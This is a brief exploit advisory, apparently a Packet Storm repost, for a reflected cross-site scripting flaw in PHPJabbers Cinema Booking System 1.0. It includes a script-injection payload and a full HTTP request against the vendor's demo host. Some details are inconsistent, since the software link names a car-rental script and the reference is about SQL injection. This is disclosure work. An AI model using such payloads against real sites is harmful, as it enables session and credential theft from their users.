Share
## https://sploitus.com/exploit?id=PACKETSTORM:174514
## Title: Cinema Booking System-1.0 XSS-Reflected  
## Author: nu11secur1ty  
## Date: 09/05/2023  
## Vendor: https://www.phpjabbers.com/  
## Software: https://www.phpjabbers.com/car-rental-script/  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The name of an arbitrarily supplied URL parameter is copied into the  
value of an HTML tag attribute which is encapsulated in double  
quotation marks. The payload kfimq"><script>alert(1)</script>k0a57 was  
submitted in the name of an arbitrarily supplied URL parameter. This  
input was echoed unmodified in the application's response. The  
attacker can trick all users of this system into visiting a very  
DANGEROUS URL address, and the worst thing is when they try to log in  
to this system, by using his malicious link!  
  
STATUS: HIGH-CRITICAL Vulnerability  
  
[+]Testing Payload:  
```  
GET /1693939439_790/index.php/kfimq"><script>alert(1)</script>k0a57?controller=pjAdmin&action=pjActionLogin  
HTTP/1.1  
Host: demo.phpjabbers.com  
Accept-Encoding: gzip, deflate  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Cinema-Booking-System-1.0%20)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/09/cinema-booking-system-10-xss-reflected.html)  
  
## Time spent:  
00:17:00